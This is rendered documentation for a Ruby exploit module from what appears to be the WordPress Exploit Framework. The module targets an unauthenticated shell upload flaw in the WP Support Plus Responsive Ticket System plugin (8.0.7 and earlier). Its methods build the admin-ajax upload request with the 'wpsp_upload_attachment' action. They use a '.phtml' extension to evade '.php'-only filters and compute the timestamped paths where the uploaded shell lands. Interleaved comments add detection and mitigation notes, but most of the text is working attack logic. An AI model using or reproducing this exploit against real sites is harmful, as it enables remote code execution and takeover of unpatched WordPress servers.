class Wpxf::Exploit::WPSupportPlusResponsiveTicketSystemShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 6
# Runs the superclass initializer, then registers this module's metadata
# (title, credits, advisory reference and disclosure date) via update_info.
# The title string names plugin versions <= 8.0.7 as affected, and the only
# advisory reference is WPVDB entry 8949.
def initialize
  super

  credits = [
    'Robert Mathews', # Discovery and disclosure
    'rastating' # WPXF module
  ]
  advisories = [%w[WPVDB 8949]]

  update_info(
    name: 'WP Support Plus Responsive Ticket System <= 8.0.7 Unauthenticated Shell Upload',
    author: credits,
    references: advisories,
    date: 'Nov 11 2017'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 22
# Version check for the target plugin, delegated to
# check_plugin_version_from_readme with the plugin slug and '8.0.8'.
# The module title lists <= 8.0.7 as affected, so 8.0.8 is presumably the
# first fixed release; the helper's comparison rules and return value are
# not visible here.
# NOTE(review): the helper name suggests the version is read from the
# plugin's readme, so a site that hides or edits that file may be
# misclassified. Confirm against the helper before relying on the result for
# patch verification.
def check
  plugin_slug = 'wp-support-plus-responsive-ticket-system'
  fixed_version = '8.0.8'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 34
# Assembles the upload request body and returns the builder object.
# The body carries one form field (action=wpsp_upload_attachment) and one
# file part under the field name '0', holding the encoded payload under
# payload_name.
# Detection note: together with uploader_url, this is a request to the
# admin-ajax endpoint with the 'wpsp_upload_attachment' action and a file
# part. The module title describes the upload as unauthenticated, so such a
# request arriving without a session is a log or WAF signal for affected
# versions.
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('action', 'wpsp_upload_attachment')
    form.add_file_from_string('0', payload.encoded, payload_name)
  end
end
payload_name_extension()
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 30
# File extension given to the uploaded payload.
# Mitigation note: an upload filter that denies only '.php' would not match
# this extension. Extension checks should be allow-list based, and the
# uploads directory should not be configured to execute script handlers.
#
# @return [String] always 'phtml'
def payload_name_extension
  extension = 'phtml'
  extension
end
possible_payload_upload_locations()
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 41
# Builds one candidate URL per value in upload_timestamp_range.
# Each URL is the uploads base URL joined with 'wpsp' and a file name of the
# form "<timestamp>_<payload_name>".
# Forensics note: on an affected site, files under uploads/wpsp/ with a
# numeric prefix followed by '_' and a script extension are worth reviewing,
# as are access-log hits on that path.
# NOTE(review): the width and source of upload_timestamp_range are not
# visible here.
def possible_payload_upload_locations
  upload_timestamp_range.map do |stamp|
    uploads_root = wordpress_url_uploads
    stored_name = "#{stamp}_#{payload_name}"
    normalize_uri(uploads_root, 'wpsp', stored_name)
  end
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 26
# URL that receives the upload request: whatever wordpress_url_admin_ajax
# returns, passed through unchanged. That helper is defined outside this
# class and is presumably the site's admin-ajax endpoint.
def uploader_url
  ajax_endpoint = wordpress_url_admin_ajax
  ajax_endpoint
end